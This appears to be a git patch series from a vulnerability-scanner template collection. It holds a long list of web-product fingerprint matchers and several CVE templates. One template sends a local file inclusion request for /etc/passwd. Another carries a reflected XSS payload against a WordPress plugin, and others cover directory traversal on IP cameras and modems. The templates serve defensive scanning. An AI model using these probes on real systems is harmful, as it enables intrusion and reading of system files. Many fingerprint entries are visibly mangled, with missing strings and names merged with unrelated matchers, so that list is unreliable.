account-manager-exhibition-system + words: + - action="/system/login/login.shtml + + - type: word + condition: and + name: achecker-web-accessibility-evaluation-tool + words: + - content="achecker is a web accessibility + + - type: word + condition: and + name: acsoft-cloud + words: + - sdiyun.com, all rights reserved + + - type: word + condition: and + name: acsoft-cloud + words: + - onrememberpasswordclick + + - type: word + condition: and + name: acsoft-reimbursement-system + words: + -
    location.href="ucenter"; + + - type: word + condition: and + name: activecollab + words: + - powered by activecollab + + - type: word + condition: and + name: activecollab + words: + -

    + - Acunetix + + - type: word + condition: and + name: adaptec-maxview + words: + - action="/maxview/manager/login.xhtml + + - type: word + condition: and + name: adimoney + words: + - <img src="/img/logo.png" alt="adimoney"/> + + - type: word + condition: and + name: adimoney + words: + - 'content="adimoney.com mobile advertisement network. ' + + - type: word + condition: and + name: adiscon-loganalyzer + words: + - adiscon gmbh + + - type: word + condition: and + name: adminer + words: + - https://www.adminer.org + + - type: word + condition: and + name: adobe-coldfusion + words: + - /cfajax/ + + - type: word + condition: and + name: adobe-coldfusion + words: + - <cfscript> + + - type: word + condition: and + name: adobe-connect + words: + - /common/scripts/showcontent.js + + - type: word + condition: and + name: adobe-cq5 + words: + - _jcr_content + + - type: word + condition: and + name: adobe-experience-manager + words: + - adobe experience manager + + - type: word + condition: and + name: adobe-experience-manager + words: + - ' class="coral-heading coral-heading--1"' + + - type: word + condition: and + name: adobe-flex + words: + - adobe flex + + - type: word + condition: and + name: adobe-flex + words: + - learn more about flex at http://flex.org + + - type: word + condition: and + name: adobe-golive + words: + - generator" content="adobe golive + + - type: word + condition: and + name: adobe-magento + words: + - /skin/frontend/ + + - type: word + condition: and + name: adobe-magento + words: + - blank_img + + - type: word + condition: and + name: adobe-robohelp + words: + - generator" content="adobe robohelp + + - type: word + condition: and + name: adt-iam + words: + - content="tpn,vpn,内网安全,内网控制,主机防护" + + - type: word + condition: and + name: advanced-electron-forum + words: + - powered by aef + + - type: word + condition: and + name: advantech-webaccess + words: + - /bw_templete1.dwt + + - type: word + condition: and + name: advantech-webaccess + words: + - /broadweb/webaccessclientsetup.exe + + - type: word + condition: and + name: advantech-webaccess + words: + - /broadweb/bwuconfig.asp + + - type: word + condition: and + name: advantech_wise + words: + - remote manage your intelligent systems + + - type: word + condition: and + name: adviserlogiccli + words: + - navigator.serviceworker.register('/adviserlogiccache.js') + + - type: word + condition: and + name: afterlogic-webmail + words: + - afterlogic webmail pro + + - type: word + condition: and + name: agilebpm + words: + - class="logo-element">agile-bpm + + - type: word + condition: and + name: agilebpm + words: + - class="logo-element">bpm + + - type: word + condition: and + name: agoracgi + words: + - /agora.cgi?product= + - /store/agora.cgi + + - type: word + condition: and + name: ahnlab-trusguard-ssl-vpn + words: + - trusguard ssl vpn client + + - type: word + condition: and + name: aidex + words: + - http://www.aidex.de/ + + - type: word + condition: and + name: aisino-telecom + words: + - <font class="bottomfont">航天信息股份有限公司 电信行业版 + + - type: word + condition: and + name: ajenti-server-admin-panel + words: + - action="/ajenti:auth" + - src="/ajenti:static/ + + - type: word + condition: and + name: akiva-webboard + words: + - powered by webboard + + - type: word + condition: and + name: alcasar + words: + - valoriserdiv5 + + - type: word + condition: and + name: alcatel_lucent-omnivista-cirrus + words: + - /help/en-us/others/ov-cirrus_cookiepolicy.html + + - type: word + condition: and + name: ali-monitoring-system + words: + - /monitor/css/monitor.css + + - type: word + condition: and + name: ali-monitoring-system + words: + - href="/monitor/monitoritem/monitoritemlist.htm + + - type: word + condition: and + name: alibaba-group-dms + words: + - copyright © dms all rights reserved (alibaba 数据管理产品) + + - type: word + condition: and + name: alibaba-group-tlog + words: + - content="tlog 实时数据处理 + + - type: word + condition: and + name: aliyun-rds + words: + - class="legend">rds管理系统</div> + + - type: word + condition: and + name: aliyuncdn + words: + - cdn.aliyuncs.com + + - type: word + condition: and + part: header + name: aliyunoss + words: + - 'Server: aliyunoss' + + - type: word + condition: and + name: alliance-web-platform + words: + - window.location = "/swp/group/admin"; + + - type: word + condition: and + name: alstom-system + words: + - href="technology_communion.asp + + - type: word + condition: and + name: am-websystem + words: + - id="dvlogo" + + - type: word + condition: and + name: amaze-ui + words: + - amazeui.min.js + + - type: word + condition: and + name: amaze-ui + words: + - amazeui.js + + - type: word + condition: and + name: amaze-ui + words: + - amazeui.css + + - type: word + condition: and + name: ambuf-onlineexam + words: + - 北京众恒志信科技 + + - type: word + condition: and + name: ami-megarac-sp + words: + - <modelname>ami megarac sp</modelname> + + - type: word + condition: and + name: ami-megarac-spx + words: + - <modelname>ami megarac spx</modelname> + + - type: word + condition: and + name: anecms + words: + - content="erwin aligam - ealigam@gmail.com + + - type: word + condition: and + name: animati-pacs + words: + - <form action="" onsubmit="pacs.login.sendpasswordrecoverymail() + + - type: word + condition: and + name: anmai-system + words: + - ' id="lblname">版权所有:上海安脉计算机科技有限公司' + + - type: word + condition: and + name: anmai-system + words: + - id="lblname1">版权所有:上海安脉计算机科技有限公司 + + - type: word + condition: and + name: anmai-system + words: + - <font color="#000000">上海安脉计算机科技有限公司</font> + + - type: word + condition: and + name: anneca-intouch-crm + words: + - href="http://www.anneca.cz" + + - type: word + condition: and + name: anta-asg + words: + - setcookie("asglanguage",document.form1.planguage.value) + + - type: word + condition: and + name: aolansoft-studentsystem + words: + - vcode.aspx + + - type: word + condition: and + name: apabi-digital-resource-platform + words: + - default/apabi.css + + - type: word + condition: and + name: apabi-digital-resource-platform + words: + - <link href="http://apabi + + - type: word + condition: and + name: apache-activemq + words: + - <title>Apache ActiveMQ + + - type: word + condition: and + name: apache-airflow + words: + - Airflow + + - type: word + condition: and + name: apache-airflow + words: + - src="/static/pin_100.png" + + - type: word + condition: and + name: apache-airflow + words: + - airflow + + - type: word + condition: and + name: apache-ambari + words: + - '"/licenses/NOTICE.txt"' + - Ambari + + - type: word + condition: and + name: apache-archiva + words: + - /archiva.js + + - type: word + condition: and + name: apache-archiva + words: + - /archiva.css + + - type: word + condition: and + name: apache-axis + words: + - http://ws.apache.org/axis2 + + - type: word + condition: and + name: apache-axis2 + words: + - axis2-admin + - axis2-web + + - type: word + condition: and + part: header + name: apache-cocoon + + - type: word + condition: and + name: apache-druid + words: + - content="Apache Druid console" + + - type: word + condition: and + name: apache-flink + words: + - Apache Flink Web Dashboard + + - type: word + condition: and + name: apache-flink + words: + - apache flink dashboardthe apache haus + + - type: word + condition: and + name: apache-kylin + words: + - + + - type: word + condition: and + name: apache-kylin + words: + - href="/kylin/" + + - type: word + condition: and + name: apache-mesos + words: + - apache mesos + + - type: word + condition: and + name: apache-nifi + words: + - /nifi + + - type: word + condition: and + name: apache-ofbiz + words: + - Powered by OFBiz + + - type: word + condition: and + name: apache-oozie-web-console + words: + - oozie-console + + - type: word + condition: and + name: apache-oozie-web-console + words: + - href="/oozie">oozie console + + - type: word + condition: and + part: header + name: apache-shiro + words: + - 'Set-Cookie: rememberMe=deleteMe' + + - type: word + condition: and + name: apache-shiro + words: + - shiro + + - type: word + condition: and + name: apache-skywalking + words: + - sorry but SkyWalking doesn't work + + - type: word + condition: and + part: header + name: apache-solr + words: + - 'Location: /solr/' + + - type: word + condition: and + name: apache-struts + words: + - content="Struts2 Showcase for Apache Struts Project" + + - type: word + condition: and + name: apache-tomcat + words: + -

    Apache Tomcat/ + + - type: word + condition: and + name: apache-tomcat + words: + - Apache Tomcat/ + + - type: word + condition: and + name: apache-tomcat + words: + - /manager/html + - /manager/status + + - type: word + condition: and + name: apache-tomcat + words: + - href="tomcat.css + + - type: word + condition: and + name: apache-tomcat + words: + - this is the default tomcat home page + + - type: word + condition: and + name: apache-tomcat + words: + - <h3>apache tomcat + + - type: word + condition: and + name: apache-unomi + words: + - logo apache unomi + + - type: word + condition: and + name: apache-wicket + words: + - xmlns:wicket= + + - type: word + condition: and + name: apache-wicket + words: + - /org.apache.wicket. + + - type: word + condition: and + name: apc-management + words: + - this object on the apc management web server is protected + + - type: word + condition: and + name: apereo-cas + words: + - cas – central authentication service + + - type: word + condition: and + name: apex-livebpm + words: + - href="/plug-in/login/fixed/css/login.css" + + - type: word + condition: and + part: header + name: apilayer-caddy + words: + - 'Server: caddy' + + - type: word + condition: and + name: appcms + words: + - powerd by appcms + + - type: word + condition: and + name: appex-lotapp + words: + - appex network corporation + + - type: word + condition: and + name: appex-lotapp + words: + - /change_lan.php?lanid=en + + - type: word + condition: and + name: apphp-calendar + words: + - this script was generated by apphp calendar + + - type: word + condition: and + name: appserv + words: + - appserv/softicon.gif + + - type: word + condition: and + name: appserv + words: + - index.php?appservlang=th + + - type: word + condition: and + name: apusic + words: + - <td>管理apusic应用服务器</td> + + - type: word + condition: and + part: header + name: apusic + words: + - 'Server: apusic application server' + + - type: word + condition: and + name: arab-portal + words: + - 'powered by: arab' + + - type: word + condition: and + name: argosoft-mail-server + words: + - argosoft mail server plus for + + - type: word + condition: and + name: array-vpn + words: + - an_util.js + + - type: word + condition: and + name: articlepublisherpro + words: + - www.articlepublisherpro.com + + - type: word + condition: and + name: articlepublisherpro + words: + - content="article publisher pro + + - type: word + condition: and + part: header + name: arvancloud + words: + - 'Server: arvancloud' + + - type: word + condition: and + name: asp168-oho + words: + - upload/moban/images/style.css + + - type: word + condition: and + name: asp168-oho + words: + - default.php?mod=article&do=detail&tid + + - type: word + condition: and + name: aspcms + words: + - content="aspcms + + - type: word + condition: and + name: aspcms + words: + - /inc/aspcms_advjs.asp + + - type: word + condition: and + name: aspentech-aspen-infoplus21 + words: + - src="/aspencui/css/appstyles.js + + - type: word + condition: and + name: aspnet-mvc + words: + - <h2>modify this template to jump-start your asp.net mvc application.</h2> + + - type: word + condition: and + name: aspnet-mvc + words: + - asp.net mvc application</p> + + - type: word + condition: and + name: aspnet-requestvalidationmode + words: + - httprequestvalidationexception + + - type: word + condition: and + name: aspnet-requestvalidationmode + words: + - request validation has detected a potentially dangerous client input value + + - type: word + condition: and + name: asproxy + words: + - surf the web invisibly using asproxy power + + - type: word + condition: and + name: asproxy + words: + - btnasproxydisplaybutton + + - type: word + condition: and + name: astaro-command-center + words: + - /js/_variables_from_backend.js? + + - type: word + condition: and + name: astaro-command-center + words: + - commandcenter + + - type: word + condition: and + name: asterisk + words: + - asterisk_rawmanpath + + - type: word + condition: and + name: asus-aicloud + words: + - href="/smb/css/startup.png" + + - type: word + condition: and + name: atfuture-system + words: + - /content/web/theme/skin01/img/p_login_logo01.png + + - type: word + condition: and + name: atmail + words: + - powered by atmail + + - type: word + condition: and + name: atmail + words: + - /index.php/mail/auth/processlogin + + - type: word + condition: and + name: atmail + words: + - <input id="mailserverinput + + - type: word + condition: and + name: atutor-elearning + words: + - content="atutor + + - type: word + condition: and + part: header + name: atutor-elearning + words: + - 'Set-Cookie: atutorid' + + - type: word + condition: and + name: aurion + words: + - <!-- aurion teal will be used as the login-time default + + - type: word + condition: and + name: aurion + words: + - /aurion.js + + - type: word + condition: and + name: authine-h3-bpm + words: + - h3 bpm suite信息化的最佳实践 + + - type: word + condition: and + name: autoindex-php-script + words: + - title="autoindex default + + - type: word + condition: and + part: header + name: autoindex-php-script + words: + - 'Set-Cookie: autoindex2' + + - type: word + condition: and + name: autoindex-php-script + words: + - autoindex.sourceforge.net/ + + - type: word + condition: and + name: automatedlogiccorporation-webctrl + words: + - href="/_common/lvl5/about/eula.jsp" + + - type: word + condition: and + name: autoset + words: + - .logo-autoset + + - type: word + condition: and + name: auxilium-petratepro + words: + - index.php?cmd=11 + + - type: word + condition: and + name: av-arcade + words: + - powered by <a href="http://www.avscripts.net/avarcade/ + + - type: word + condition: and + name: avantfax + words: + - src="images/avantfax-big.png" border="0" alt="avantfax + + - type: word + condition: and + name: avantfax-ictfax + words: + - <img src="images/avantfax-big.png" border="0" alt="ictfax + + - type: word + condition: and + name: avantfax-ictfax + words: + - content="ictfax + + - type: word + condition: and + name: avaya-application-enablement-services + words: + - <b>application enablement services </b> + + - type: word + condition: and + name: avaya-application-enablement-services + words: + - avaya + + - type: word + condition: and + name: avaya-aura-utility-server + words: + - vmstitle">avaya aura™ utility server + + - type: word + condition: and + name: avaya-aura-utility-server + words: + - /webhelp/base/utility_toc.htm + + - type: word + condition: and + name: avaya-aura-utility-server + words: + - avaya aura® utility services + + - type: word + condition: and + name: avaya-aura-utility-server + words: + - avaya inc. all rights reserved + + - type: word + condition: and + name: avaya-communication-manager + words: + - var newlocation = "https://" + target + "/cgi-bin/common/issue"; + + - type: word + condition: and + name: avaya-system-platform + words: + - content="0;url=vsplogin.action + + - type: word + condition: and + name: avtech-video-web-server + words: + - /av732e/setup.exe + + - type: word + condition: and + name: aws-ec2 + words: + - welcome to nginx on amazon ec2! + + - type: word + condition: and + name: aws-elastic-beanstalk + words: + - <h2>what's next?</h2> + + - type: word + condition: and + name: aws-elastic-beanstalk + words: + - aws.amazon.com/elasticbeanstalk + + - type: word + condition: and + name: axcms + words: + - content="axcms.net + + - type: word + condition: and + name: axcms + words: + - generated by axcms.net + + - type: word + condition: and + name: axentra-hipserv + words: + - content="axentra + + - type: word + condition: and + name: axgate-sslvpn + words: + - class="axgate" + + - type: word + condition: and + name: axis2-web + words: + - axis2-web/css/axis-style.css + + - type: word + condition: and + part: header + name: axtls-embad-httpd + words: + - 'Server: axhttpd' + + - type: word + condition: and + name: b2evolution + words: + - /powered-by-b2evolution-150t.gif + + - type: word + condition: and + name: b2evolution + words: + - powered by b2evolution + + - type: word + condition: and + name: b2evolution + words: + - content="b2evolution + + - type: word + condition: and + name: backbee + words: + - <div id="bb5-site-wrapper"> + + - type: word + condition: and + name: bad-debt-management-system + words: + - 登录密码错误次数超过5次,帐号被锁定。请联系省坏账系统管理员,或发邮件解锁 + + - type: word + condition: and + name: baidu-subaidu + words: + - id="yunjiasu_link + + - type: word + condition: and + name: baishijia-cms + words: + - /resource/images/cms.ico + + - type: word + condition: and + name: bamboocloud-bim + words: + - bim 开发配置与运维控制台 + + - type: word + condition: and + name: bangyong-pm2 + words: + - pm2项目管理系统bs版增强工具.zip + + - type: word + condition: and + name: barracuda-ssl-vpn + words: + - barracuda ssl vpn + + - type: word + condition: and + name: basic-php-events-lister + words: + - 'powered by: <a href="http://www.mevin.com/">' + + - type: word + condition: and + name: bbpress + words: + - <!-- if you like showing off the fact that your server rocks --> + + - type: word + condition: and + name: bbpress + words: + - is proudly powered by <a href="http://bbpress.org + + - type: word + condition: and + name: bees_cms + words: + - powerd by + + - type: word + condition: and + name: bees_cms + words: + - beescms + - template/default/images/slides.min.jquery.js + + - type: word + condition: and + name: bees_cms + words: + - /default/images/xslider.js + + - type: word + condition: and + name: bees_cms + words: + - /default/images/search_btn.gif + + - type: word + condition: and + name: bees_cms + words: + - powerd by beescms + + - type: word + condition: and + name: bees_cms + words: + - mx_form/mx_form.php + + - type: word + condition: and + name: beichuang-book-retrieval-system + words: + - opac_two + + - type: word + condition: and + name: bentley-systems-projectwise + words: + - href="projectwise.ico + + - type: word + condition: and + name: bestsch-ecs + words: + - /userfiles/admin/customskin + + - type: word + condition: and + name: bestsch-ecs + words: + - src="/include/ecsserverapi.js + + - type: word + condition: and + name: betasoft-pdm-data-acquisition + words: + - align="center" class="login_pdm"> + + - type: word + condition: and + name: betasoft-pdm-data-acquisition + words: + - 'background: no-repeat url(../images/login/pdmdenglu1_28.png);' + + - type: word + condition: and + name: beyeon-iot + words: + - 版权所有:郑州蓝视科技有限公司 + + - type: word + condition: and + name: beyeon-iot + words: + - var app_smp_type_name = '门店';var app_grp_type_name = '集团' + + - type: word + condition: and + name: bh-bh5000c + words: + - bhclientcer:"/modules/web/common/data/bhclient.cer + + - type: word + condition: and + name: bicesoft-super-custom-survey-voting-system + words: + - href="images/bicesoft.css" + + - type: word + condition: and + name: bicesoft-super-custom-survey-voting-system + words: + - 佰思超强自定义问卷调查系统(bicesoft.com) + + - type: word + condition: and + name: biept-system + words: + - class="loginin loginin1" + + - type: word + condition: and + name: bigdump + words: + - 'bigdump: staggered mysql dump importer' + + - type: word + condition: and + name: billingtesttool + words: + - href:'/billtool/querysum' + + - type: word + condition: and + name: bio-lims + words: + - /lims/dist/css/font-awesome.min.css + + - type: word + condition: and + name: biscom-delivery-server + words: + - /bds/stylesheets/fds.css + + - type: word + condition: and + name: biscom-delivery-server + words: + - /bds/includes/fdsjavascript.do + + - type: word + condition: and + name: bit-service + words: + - bit-xxzs + - xmlpzs/webissue.asp + + - type: word + condition: and + name: bitbucket + words: + - bitbucket.page.login + + - type: word + condition: and + name: bithighway-product + words: + - href='http://www.bithighway.com' target=_blank>北京碧海威科技有限公司< + + - type: word + condition: and + part: header + name: bitkeeper + words: + - 'Server: bkhttp' + + - type: word + condition: and + name: bitnami-redmine-stack + words: + - alt="bitnami redmine stack + + - type: word + condition: and + name: bitrix-site-manager + words: + - bitrix_sm_time_zone + + - type: word + condition: and + name: bitrix-site-manager + words: + - bx.setcsslist + + - type: word + condition: and + name: bjca + words: + - <li><a href="/install/certapp_bd.exe">下载证书应用环境</a></li> + + - type: word + condition: and + name: bjqit-crm + words: + - href=/css/ordercomplaint + + - type: word + condition: and + part: header + name: blackjumbodog + words: + - 'Server: blackjumbodog' + + - type: word + condition: and + part: header + name: blazix + words: + - 'Server: blazix java server' + + - type: word + condition: and + name: blogenginenet + words: + - pics/blogengine.ico + + - type: word + condition: and + name: blogenginenet + words: + - http://www.dotnetblogengine.net + + - type: word + condition: and + name: blogger + words: + - content='blogger + + - type: word + condition: and + name: blogger + words: + - powered by blogger + + - type: word + condition: and + name: blueonyx + words: + - thank you for using the blueonyx + + - type: word + condition: and + name: bluepacific-network-monitoring-system + words: + - /biradarserver/web/ + + - type: word + condition: and + name: bluepacific-share-content-management-system + words: + - /visadmin/viscms/index.do + + - type: word + condition: and + name: bluequartz + words: + - value="copyright (c) 2000, cobalt networks + + - type: word + condition: and + name: boastmachine + words: + - powered by boastmachine + + - type: word + condition: and + name: boastmachine + words: + - powered by <a href="http://boastology.com + + - type: word + condition: and + name: bossmail + words: + - <span class="footer_t">powered by bossmail</span> + + - type: word + condition: and + name: bossmail + words: + - href="http://apps.microsoft.com/windows/zh-cn/app/bossmail/24f4bdb3-1bca-467e-9dd9-15a5d278aec6 + + - type: word + condition: and + name: bowen-providence-car-loading-reservation-system + words: + - /public/base/js/plugins/crypto/rsa.js + + - type: word + condition: and + name: boxiao-system + words: + - var bxnstaticresroot='/bxn-static-resource/resources' + + - type: word + condition: and + name: brewblogger + words: + - developed by <a href="http://www.zkdigital.com + + - type: word + condition: and + name: bridge5asia-amss + words: + - 'education area management support system : amss++' + + - type: word + condition: and + name: bridge5asia-amss + words: + - /statics/js/mdo-angular-cryptography.js + + - type: word + condition: and + name: broadcom-ca-pam + words: + - ispamclient = false + + - type: word + condition: and + name: broadcom-ca-pam + words: + - /cspm/cleansession.jsp + + - type: word + condition: and + name: brocade-data-angle-guard-database + words: + - window.location.host + "/agweb" + + - type: word + condition: and + name: brocade-network-advisor + words: + - <span class="ui-menuitem-text">about network advisor</span></a> + + - type: word + condition: and + name: browsercms + words: + - powered by browsercms + + - type: word + condition: and + name: browsercms + words: + - content="browsercms + + - type: word + condition: and + name: bugfree + words: + - id="logo" alt=bugfree + + - type: word + condition: and + name: bugfree + words: + - class="loginbgimage" alt="bugfree + + - type: word + condition: and + name: bugzilla + words: + - enter_bug.cgi + + - type: word + condition: and + name: bugzilla + words: + - /cgi-bin/bugzilla/ + + - type: word + condition: and + name: bulletlink-newspaper-template + words: + - /modalpopup/core-modalpopup.css + + - type: word + condition: and + name: bulletlink-newspaper-template + words: + - powered by bulletlink + + - type: word + condition: and + name: bullwark + words: + - <title>Bullwark Momentum Series + + - type: word + condition: and + name: burning-board-lite + words: + - powered by 关于c-lodop免费和注册授权

    + + - type: word + condition: and + name: c-lodop + words: + - document.getelementbyid("reqid").value==document.getelementbyid("licid").value + + - type: word + condition: and + name: ca-siteminder + words: + - + + - type: word + condition: and + name: edusoho-open-source-web-classroom- + words: + - powered by edusoho + + - type: word + condition: and + name: efront + words: + - Elastic HD Dashboard + + - type: word + condition: and + name: elasticsearch + words: + - ' "tagline" : "You Know, for Search"' + + - type: word + condition: and + name: elite_cms + words: + - copyright © 2003 - 2017 empirebak + + - type: word + condition: and + name: empirebak + words: + - + + - type: word + condition: and + name: enigma2 + words: + - href="/web/movielist.rss?tag + + - type: word + condition: and + name: entercrm + words: + - entercrm + + - type: word + condition: and + name: enterpriseloginmanagementsystem + words: + - txtusername").focus(); //默认焦点 + + - type: word + condition: and + name: enterpriseloginmanagementsystem + words: + - themes/scripts/functionjs.js + + - type: word + condition: and + name: entrance-guard-system + words: + - /media/images/zkeco16.ico + + - type: word + condition: and + name: episerver + words: + - content="episerver + + - type: word + condition: and + name: episerver + words: + - /javascript/episerverscriptmanager.js + + - type: word + condition: and + name: epiware + words: + - epiware - project and document management + + - type: word + condition: and + name: eqmail + words: + - href="eqmail.ico + + - type: word + condition: and + name: eqmail + words: + - etcd viewer + + - type: word + condition: and + part: header + name: ethproxy + words: + - 'Server: ethproxy' + + - type: word + condition: and + name: eticket + words: + - powered by eticket + + - type: word + condition: and + name: eticket + words: + - + + - type: word + condition: and + name: eticket + words: + - /eticket/eticket.css + + - type: word + condition: and + name: etl + words: + -
    登录补天etl系统
    + + - type: word + condition: and + name: euesoft-hr + words: + - link.description = "亿华软件" + + - type: word + condition: and + name: eureka-server + words: + - eureka/css/wro.css + + - type: word + condition: and + name: eusestudy + words: + - userinfo/userfp.aspx + + - type: word + condition: and + name: evercookie + words: + - evercookie.js + + - type: word + condition: and + name: evercookie + words: + - var ec = new evercookie(); + + - type: word + condition: and + name: everything + words: + - everything.gif + + - type: word + condition: and + name: everything + words: + - everything.png + + - type: word + condition: and + name: ewebeditor + words: + - /ewebeditor.htm? + + - type: word + condition: and + name: ewebs + words: + - ClientDownload.xgi + - NewSoft + + - type: word + condition: and + name: ewebs + words: + - /js/xajax05/xajax_js/xajax_core.js + + - type: word + condition: and + name: ewebs + words: + -
    + + - type: word + condition: and + name: ewei-plagform + words: + - 易维平台 + + - type: word + condition: and + name: examstar + words: + - /examstar_icon.ico + + - type: word + condition: and + name: examstar + words: + -
    考试星为您提供方便、高效的考试服务
    + + - type: word + condition: and + name: exponent-cms + words: + - content="exponent content management system + + - type: word + condition: and + name: exponent-cms + words: + - powered by exponent cms + + - type: word + condition: and + name: extmail + words: + - setcookie('extmail_username + - 欢迎使用extmail + + - type: word + condition: and + name: extplorer + words: + - /extplorer.ico + + - type: word + condition: and + name: eyou-anti-spam-mailbox-firewall + words: + - content="亿邮大容量电子邮件系统,反垃圾邮件网关 + + - type: word + condition: and + name: eyou-mail-system + words: + - content="亿邮电子邮件系统 + + - type: word + condition: and + name: eyou-mail-system + words: + - /tpl/login/user/images/dbg.png + + - type: word + condition: and + name: eyou-mail-system + words: + - var loginssl = document.form_login.login_ssl.value; + + - type: word + condition: and + name: eyoucms + words: + - powered by eyoucms + + - type: word + condition: and + name: eyoucms + words: + - name="generator" content="eyoucms + + - type: word + condition: and + part: header + name: ez-publish + words: + - 'Set-Cookie: ezsessioncookie' + + - type: word + condition: and + part: header + name: ezoffice + words: + - 'Location: /defaultroot/portal.jsp?access=oa' + + - type: word + condition: and + name: f5-big-ip + words: + - content="F5 Networks, Inc." + + - type: word + condition: and + name: f5-bigip + words: + - content="f5 networks, inc. + + - type: word + condition: and + name: facemeeting-meeting + words: + - class="subnav">飞视美
    + + - type: word + condition: and + name: falcon + words: + -

    opsplatform

    + + - type: word + condition: and + name: falcon + words: + - textarea class="form-control endpoints + + - type: word + condition: and + name: falipu-iot + words: + - id="t1">安全、稳定、安全 + + - type: word + condition: and + name: fangmail + words: + - /fangmail/cgi/index.cgi + - /fangmail/default/css/em_css.css + + - type: word + condition: and + name: fangpage-exam + words: + - href="http://fpexam.fangpage.com" target= + + - type: word + condition: and + name: fangpage-exam + words: + - /sites/exam/statics/css/login.css + + - type: word + condition: and + name: fanpusoft-construction-work-oa + words: + - /dwr/interface/loginservice.js + + - type: word + condition: and + name: fanwe + words: + - app/tpl/fanwe_1/images/lazy_loading.gif + + - type: word + condition: and + name: fanwe + words: + - index.php?ctl=article_cate + + - type: word + condition: and + name: faq-manager + words: + -

    + + + +

    + + - type: word + condition: and + name: faq-manager + words: + - admin area
    - -## Nuclei Templates Top 10 statistics - | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| | cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 | From 65bddf3e33180060406cd755f2a626122056f806 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 20 Jul 2021 20:08:18 +0700 Subject: [PATCH 0951/4083] Create CVE-2020-29227.yaml --- cves/2020/CVE-2020-29227.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2020/CVE-2020-29227.yaml diff --git a/cves/2020/CVE-2020-29227.yaml b/cves/2020/CVE-2020-29227.yaml new file mode 100644 index 0000000000..71196da28b --- /dev/null +++ b/cves/2020/CVE-2020-29227.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-29227 + +info: + name: Car Rental Management System 1.0 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution. + reference: https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=/etc/passwd%00" + + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + part: body From 1b8ebe74b66c8070fed970ed7ae3c88a3bbad7bd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:47:19 +0530 Subject: [PATCH 0952/4083] Update CVE-2016-1000127.yaml --- cves/2016/CVE-2016-1000127.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000127.yaml b/cves/2016/CVE-2016-1000127.yaml index 9539d37287..459e6c5829 100644 --- a/cves/2016/CVE-2016-1000127.yaml +++ b/cves/2016/CVE-2016-1000127.yaml @@ -4,19 +4,20 @@ info: name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Reflected XSS in wordpress plugin ajax-random-post v2.00 reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c38ada9a7133aa054f45faeaea63253c04a6db79 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:50:02 +0530 Subject: [PATCH 0953/4083] Update CVE-2010-4231.yaml --- cves/2010/CVE-2010-4231.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-4231.yaml b/cves/2010/CVE-2010-4231.yaml index fc754ae86b..0a0c3a1ac7 100644 --- a/cves/2010/CVE-2010-4231.yaml +++ b/cves/2010/CVE-2010-4231.yaml @@ -4,7 +4,10 @@ info: name: Camtron CMNC-200 IP Camera - Directory Traversal author: daffainfo severity: high - reference: https://www.exploit-db.com/exploits/15505 + description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2010-4231 + - https://www.exploit-db.com/exploits/15505 tags: cve,cve2010,iot,lfi requests: From d1eca2b59ecf86fd806e4c09d0ab78ece85f23ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 20 Jul 2021 19:54:23 +0530 Subject: [PATCH 0954/4083] Update CVE-2010-2307.yaml --- cves/2010/CVE-2010-2307.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2307.yaml b/cves/2010/CVE-2010-2307.yaml index e841195a11..22129fc120 100644 --- a/cves/2010/CVE-2010-2307.yaml +++ b/cves/2010/CVE-2010-2307.yaml @@ -4,7 +4,10 @@ info: name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal author: daffainfo severity: high - reference: https://www.securityfocus.com/bid/40550/info + description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request. + reference: | + - https://www.securityfocus.com/bid/40550/info + - https://nvd.nist.gov/vuln/detail/CVE-2010-2307 tags: cve,cve2010,iot,lfi requests: From f9b3724f87e104afb5c28577d980b61f195d52cc Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 20 Jul 2021 16:46:25 -0500 Subject: [PATCH 0955/4083] Update general-tokens.yaml --- exposures/tokens/generic/general-tokens.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index bb401d80ae..98bc651308 100644 --- 